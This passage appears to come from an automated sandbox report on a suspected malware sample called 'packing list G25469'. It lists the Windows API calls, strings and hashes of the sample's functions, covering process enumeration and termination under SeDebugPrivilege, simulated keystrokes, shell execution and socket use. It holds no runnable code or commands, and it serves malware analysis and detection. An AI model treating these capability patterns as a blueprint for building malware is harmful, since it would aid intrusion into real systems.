                                                  • API ID: MessageSend$Window_wcscat
                                                  • String ID: SysListView32
                                                  • API String ID: 307300125-78025650
                                                  • Opcode ID: 801b4b7829be8064ecdd1a516bb21b64e0d9ded5cc108ba24d40e28229e3b4ef
                                                  • Instruction ID: c079cd17bcbc210956b56d4e77e52ed3f7291c4866f866a6fc8e01ce174b0ca0
                                                  • Opcode Fuzzy Hash: 801b4b7829be8064ecdd1a516bb21b64e0d9ded5cc108ba24d40e28229e3b4ef
                                                  • Instruction Fuzzy Hash: 0E419171900348EBEF219F68CC85BEE77E8EF08350F1049AAF945A7291D7759D84CB60
                                                  APIs
                                                    • Part of subcall function 00B76532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00B76554
                                                    • Part of subcall function 00B76532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00B76564
                                                    • Part of subcall function 00B76532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 00B765F9
                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00B9179A
                                                  • GetLastError.KERNEL32 ref: 00B917AD
                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00B917D9
                                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 00B91855
                                                  • GetLastError.KERNEL32(00000000), ref: 00B91860
                                                  • CloseHandle.KERNEL32(00000000), ref: 00B91895
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                  • String ID: SeDebugPrivilege
                                                  • API String ID: 2533919879-2896544425
                                                  • Opcode ID: d89f3b39fb6c3cb0d2d926de7124dfa90e64e333ded98b1072722f6760ebc520
                                                  • Instruction ID: 837f0cb8e5f937af0cad09ac51b829f0664d6ca7245f22e574d944d0963c21bc
                                                  • Opcode Fuzzy Hash: d89f3b39fb6c3cb0d2d926de7124dfa90e64e333ded98b1072722f6760ebc520
                                                  • Instruction Fuzzy Hash: 35419D71600202AFDB05EF58C8D5F6EB7E5AF54700F04C4E8F9069F2D2DBB8AA04AB51
                                                  APIs
                                                  • LoadIconW.USER32(00000000,00007F03), ref: 00B758B8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: IconLoad
                                                  • String ID: blank$info$question$stop$warning
                                                  • API String ID: 2457776203-404129466
                                                  • Opcode ID: 2106dd89ad202fabccb28f4f762429c64d062b3c07febe8a483075e111c86be7
                                                  • Instruction ID: 3a47f2931c0e62b1966ee542b2681c5ae3af68e6f5c35e1b97aeb2f4acc2915e
                                                  • Opcode Fuzzy Hash: 2106dd89ad202fabccb28f4f762429c64d062b3c07febe8a483075e111c86be7
                                                  • Instruction Fuzzy Hash: 25110A3120D742BFE7215B659C82EAA33DCDF15720B2040FAF964E62C1E7F0AA005266
                                                  APIs
                                                  • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 00B7A806
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: ArraySafeVartype
                                                  • String ID:
                                                  • API String ID: 1725837607-0
                                                  • Opcode ID: 487fb9d429b542f491636e3539060f81d5393d5ae1af60c5d597599774588640
                                                  • Instruction ID: d4e3a6eeb801c51e26d35635f9b88cd035722d85981ff1e03b7b71a5f61a3084
                                                  • Opcode Fuzzy Hash: 487fb9d429b542f491636e3539060f81d5393d5ae1af60c5d597599774588640
                                                  • Instruction Fuzzy Hash: 77C1A17590420ADFDB44DF94D481BAEB7F4FF48311F2080A9E629E7381D734AA41CB92
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00B76B63
                                                  • LoadStringW.USER32(00000000), ref: 00B76B6A
                                                  • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00B76B80
                                                  • LoadStringW.USER32(00000000), ref: 00B76B87
                                                  • _wprintf.LIBCMT ref: 00B76BAD
                                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00B76BCB
                                                  Strings
                                                  • %s (%d) : ==> %s: %s %s, xrefs: 00B76BA8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: HandleLoadModuleString$Message_wprintf
                                                  • String ID: %s (%d) : ==> %s: %s %s
                                                  • API String ID: 3648134473-3128320259
                                                  • Opcode ID: 6f735a891cb7327bbbc9939d0af1978c18552a24c99b749729859c79dedffb1e
                                                  • Instruction ID: c34b34c19f76e20097679569e0850810c6a03ae0213d1e1c9ed34c24e0fc1c64
                                                  • Opcode Fuzzy Hash: 6f735a891cb7327bbbc9939d0af1978c18552a24c99b749729859c79dedffb1e
                                                  • Instruction Fuzzy Hash: D80112F69002087FE711A7A49D89EF777ACEB04305F0045E5B756E3141EEB49E848B74
                                                  APIs
                                                    • Part of subcall function 00B93C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B92BB5,?,?), ref: 00B93C1D
                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B92BF6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: BuffCharConnectRegistryUpper
                                                  • String ID:
                                                  • API String ID: 2595220575-0
                                                  • Opcode ID: c7a79a2e4bac39e49b04acffa479e25e4b02ccd4c091cce340801d61baead328
                                                  • Instruction ID: 029b4670beb846da04aa9c010570910b4bdd6c8ff34bd7f86683c769db567ea6
                                                  • Opcode Fuzzy Hash: c7a79a2e4bac39e49b04acffa479e25e4b02ccd4c091cce340801d61baead328
                                                  • Instruction Fuzzy Hash: BD917D71604201AFCB01EF54C891B6EBBE5FF88310F1488ADF996972A2DB74E905DF42
                                                  APIs
                                                  • select.WSOCK32 ref: 00B89691
                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00B8969E
                                                  • __WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 00B896C8
                                                  • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00B896E9
                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00B896F8
                                                  • htons.WSOCK32(?,?,?,00000000,?), ref: 00B897AA
                                                  • inet_ntoa.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,00BCDC00), ref: 00B89765
                                                    • Part of subcall function 00B6D2FF: _strlen.LIBCMT ref: 00B6D309
                                                  • _strlen.LIBCMT ref: 00B89800
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast_strlen$htonsinet_ntoaselect
                                                  • String ID:
                                                  • API String ID: 3480843537-0
                                                  • Opcode ID: be566f616b166f66a41986e9d6c747211430fef1603d05fc32e7bfdef68492be
                                                  • Instruction ID: d9805a2ebb048c4ddcd01a2163bebf0520f6bc992943b57a50e592b607ff17b2
                                                  • Opcode Fuzzy Hash: be566f616b166f66a41986e9d6c747211430fef1603d05fc32e7bfdef68492be
                                                  • Instruction Fuzzy Hash: C181D031504200AFC714EF64CC85E6BBBE8EF89710F144A9DF5559B2A1EB70ED04CB92
                                                  APIs
                                                  • __mtinitlocknum.LIBCMT ref: 00B5A991
                                                    • Part of subcall function 00B57D7C: __FF_MSGBANNER.LIBCMT ref: 00B57D91
                                                    • Part of subcall function 00B57D7C: __NMSG_WRITE.LIBCMT ref: 00B57D98
                                                    • Part of subcall function 00B57D7C: __malloc_crt.LIBCMT ref: 00B57DB8
                                                  • __lock.LIBCMT ref: 00B5A9A4
                                                  • __lock.LIBCMT ref: 00B5A9F0
                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00BE6DE0,00000018,00B65E7B,?,00000000,00000109), ref: 00B5AA0C
                                                  • EnterCriticalSection.KERNEL32(8000000C,00BE6DE0,00000018,00B65E7B,?,00000000,00000109), ref: 00B5AA29
                                                  • LeaveCriticalSection.KERNEL32(8000000C), ref: 00B5AA39
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                                  • String ID:
                                                  • API String ID: 1422805418-0
                                                  • Opcode ID: ea3e0fcecf04dd7a59666242a1f0ff89e38b29eff2350faebf6e5191cbb2fd8a
                                                  • Instruction ID: 987d16d1fe0d2e93d5b5437e62eca25a7ee925df9107f4105574d2db5edfaac2
                                                  • Opcode Fuzzy Hash: ea3e0fcecf04dd7a59666242a1f0ff89e38b29eff2350faebf6e5191cbb2fd8a
                                                  • Instruction Fuzzy Hash: A4413D719002459BEB109F68DD4475CB7F0AF05336F1083D9EC25BB1E2DBB49948CB91
                                                  APIs
                                                  • DeleteObject.GDI32(00000000), ref: 00B98EE4
                                                  • GetDC.USER32(00000000), ref: 00B98EEC
                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00B98EF7
                                                  • ReleaseDC.USER32(00000000,00000000), ref: 00B98F03
                                                  • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00B98F3F
                                                  • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00B98F50
                                                  • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00B9BD19,?,?,000000FF,00000000,?,000000FF,?), ref: 00B98F8A
                                                  • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00B98FAA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                  • String ID:
                                                  • API String ID: 3864802216-0
                                                  • Opcode ID: 5c5e7b239129025bccd0d66950c7636f134d663a405fdf247ed5d20d2fe1012a
                                                  • Instruction ID: 3cc7b89a902915c7a448171ae6839abfe8c6eb4d9b6e314b79702a07735bef52
                                                  • Opcode Fuzzy Hash: 5c5e7b239129025bccd0d66950c7636f134d663a405fdf247ed5d20d2fe1012a
                                                  • Instruction Fuzzy Hash: BA316D72100214BFEF108F50CC4AFEA3BA9EF4A715F044165FE09DB191DAB99841CBB0
                                                  APIs
                                                    • Part of subcall function 00B3936C: __swprintf.LIBCMT ref: 00B393AB
                                                    • Part of subcall function 00B3936C: __itow.LIBCMT ref: 00B393DF
                                                    • Part of subcall function 00B4C6F4: _wcscpy.LIBCMT ref: 00B4C717
                                                  • _wcstok.LIBCMT ref: 00B8184E
                                                  • _wcscpy.LIBCMT ref: 00B818DD
                                                  • _memset.LIBCMT ref: 00B81910
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                  • String ID: X
                                                  • API String ID: 774024439-3081909835
                                                  • Opcode ID: b47bd6b17b9954ac4cd963a53a5ed1640c764a97d2d05c3b8bf24cc26ce1a1ab
                                                  • Instruction ID: 6ea3040501bd3d2f231f1c52aedb253de61eceb0fecd4a4378e13fa6226dfc35
                                                  • Opcode Fuzzy Hash: b47bd6b17b9954ac4cd963a53a5ed1640c764a97d2d05c3b8bf24cc26ce1a1ab
                                                  • Instruction Fuzzy Hash: 0DC170716053409FC724EF68C995A9EB7E8FF85350F1049ADF89A972A1DB30ED05CB82
                                                  APIs
                                                    • Part of subcall function 00B4B34E: GetWindowLongW.USER32(?,000000EB), ref: 00B4B35F
                                                  • GetSystemMetrics.USER32(0000000F), ref: 00BA016D
                                                  • MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 00BA038D
                                                  • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00BA03AB
                                                  • InvalidateRect.USER32(?,00000000,00000001,?), ref: 00BA03D6
                                                  • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00BA03FF
                                                  • ShowWindow.USER32(00000003,00000000), ref: 00BA0421
                                                  • DefDlgProcW.USER32(?,00000005,?,?), ref: 00BA0440
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Window$MessageSend$InvalidateLongMetricsMoveProcRectShowSystem
                                                  • String ID:
                                                  • API String ID: 3356174886-0
                                                  • Opcode ID: 5274794f371813a53914a5a91abe097cabdb06f86c740e39520c5e2e35bf92f7
                                                  • Instruction ID: 33b4f0baf8ca1d254c9754f19e0b0267f1873c8a8ea3442de49829a1513e9a99
                                                  • Opcode Fuzzy Hash: 5274794f371813a53914a5a91abe097cabdb06f86c740e39520c5e2e35bf92f7
                                                  • Instruction Fuzzy Hash: E6A1AC35604616EBDF18DF68C9897BDBBF1FF09700F0482A5E855AB290DB74AD60CB90
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4d63cf1882d1cdf5e700daaf7da23b8078cbdaea65b6b985945453a8c035a3e1
                                                  • Instruction ID: 2e690c8c66464e332b501b83d51a07e3e17b849758510dcb6ab2d6adbbcf574c
                                                  • Opcode Fuzzy Hash: 4d63cf1882d1cdf5e700daaf7da23b8078cbdaea65b6b985945453a8c035a3e1
                                                  • Instruction Fuzzy Hash: E6718CB1904109EFDF04CF98CC88AAEBBB8FF85314F248199F915AB251C734AA05DF65
                                                  APIs
                                                  • _memset.LIBCMT ref: 00B9225A
                                                  • _memset.LIBCMT ref: 00B92323
                                                  • ShellExecuteExW.SHELL32(?), ref: 00B92368
                                                    • Part of subcall function 00B3936C: __swprintf.LIBCMT ref: 00B393AB
                                                    • Part of subcall function 00B3936C: __itow.LIBCMT ref: 00B393DF
                                                    • Part of subcall function 00B4C6F4: _wcscpy.LIBCMT ref: 00B4C717
                                                  • CloseHandle.KERNEL32(00000000), ref: 00B9242F
                                                  • FreeLibrary.KERNEL32(00000000), ref: 00B9243E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                                  • String ID: @
                                                  • API String ID: 4082843840-2766056989
                                                  • Opcode ID: 8a98a6003c9022cd2747f728701820a5acab27f00d5bed01e473ba99eddbd630
                                                  • Instruction ID: f3ced7952e96a0ebbc38176983f8b0943c74bdf741395307f288831a1eff2e5b
                                                  • Opcode Fuzzy Hash: 8a98a6003c9022cd2747f728701820a5acab27f00d5bed01e473ba99eddbd630
                                                  • Instruction Fuzzy Hash: E1715074E00619AFCF05EFA4D4919ADBBF5FF48310F1084A9E855AB351DB34AE44CB94
                                                  APIs
                                                  • GetParent.USER32(?), ref: 00B73DE7
                                                  • GetKeyboardState.USER32(?), ref: 00B73DFC
                                                  • SetKeyboardState.USER32(?), ref: 00B73E5D
                                                  • PostMessageW.USER32(?,00000101,00000010,?), ref: 00B73E8B
                                                  • PostMessageW.USER32(?,00000101,00000011,?), ref: 00B73EAA
                                                  • PostMessageW.USER32(?,00000101,00000012,?), ref: 00B73EF0
                                                  • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00B73F13
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: MessagePost$KeyboardState$Parent
                                                  • String ID:
                                                  • API String ID: 87235514-0
                                                  • Opcode ID: 4b21607e53b921603aedb3aaf4a67ddef4986bf4079344b3398c8cf1b10fa072
                                                  • Instruction ID: 929fad419fdef30eb580341e4b56e08dee605a24fc9ab1fe494857655a5434c0
                                                  • Opcode Fuzzy Hash: 4b21607e53b921603aedb3aaf4a67ddef4986bf4079344b3398c8cf1b10fa072
                                                  • Instruction Fuzzy Hash: D651C4A0A147D53DFB3643248C45BB67EE59B06B04F08C5C9F0ED5A8C2D7999EC4E760
                                                  APIs
                                                  • GetParent.USER32(00000000), ref: 00B73C02
                                                  • GetKeyboardState.USER32(?), ref: 00B73C17
                                                  • SetKeyboardState.USER32(?), ref: 00B73C78
                                                  • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00B73CA4
                                                  • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00B73CC1
                                                  • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00B73D05
                                                  • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00B73D26
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: MessagePost$KeyboardState$Parent
                                                  • String ID:
                                                  • API String ID: 87235514-0
                                                  • Opcode ID: b6672f65e115a80bac3dc7772c738d1407d0c9c41eb336b513f6ddbdd55b3b6d
                                                  • Instruction ID: 62e1d837c1e2badcc3b0421535c7414a250bc3b7fcd7557198ab6f8af6d0f429
                                                  • Opcode Fuzzy Hash: b6672f65e115a80bac3dc7772c738d1407d0c9c41eb336b513f6ddbdd55b3b6d
                                                  • Instruction Fuzzy Hash: 8451D1A05087D539FB3287348C55BB6BED9EB06B00F08C4D8E0ED568C2D795EE84E760
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: _wcsncpy$LocalTime
                                                  • String ID:
                                                  • API String ID: 2945705084-0
                                                  • Opcode ID: 5cb49dfe61ce9f8dfce57ce4681a217c92f5e923712169f6bc228c64dba1d4d6
                                                  • Instruction ID: 0a0e987b2e3f6167b899a746137ca1b65c2e4ead23214eddb54b85520155aafb
                                                  • Opcode Fuzzy Hash: 5cb49dfe61ce9f8dfce57ce4681a217c92f5e923712169f6bc228c64dba1d4d6
                                                  • Instruction Fuzzy Hash: 98417066C11254BADB10EBF4C846ACFB3ECDF05311F5489E6E918F3121FA34E61883A9
                                                  APIs
                                                  • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00B98FE7
                                                  • GetWindowLongW.USER32(010EF2F0,000000F0), ref: 00B9901A
                                                  • GetWindowLongW.USER32(010EF2F0,000000F0), ref: 00B9904F
                                                  • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00B99081
                                                  • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00B990AB
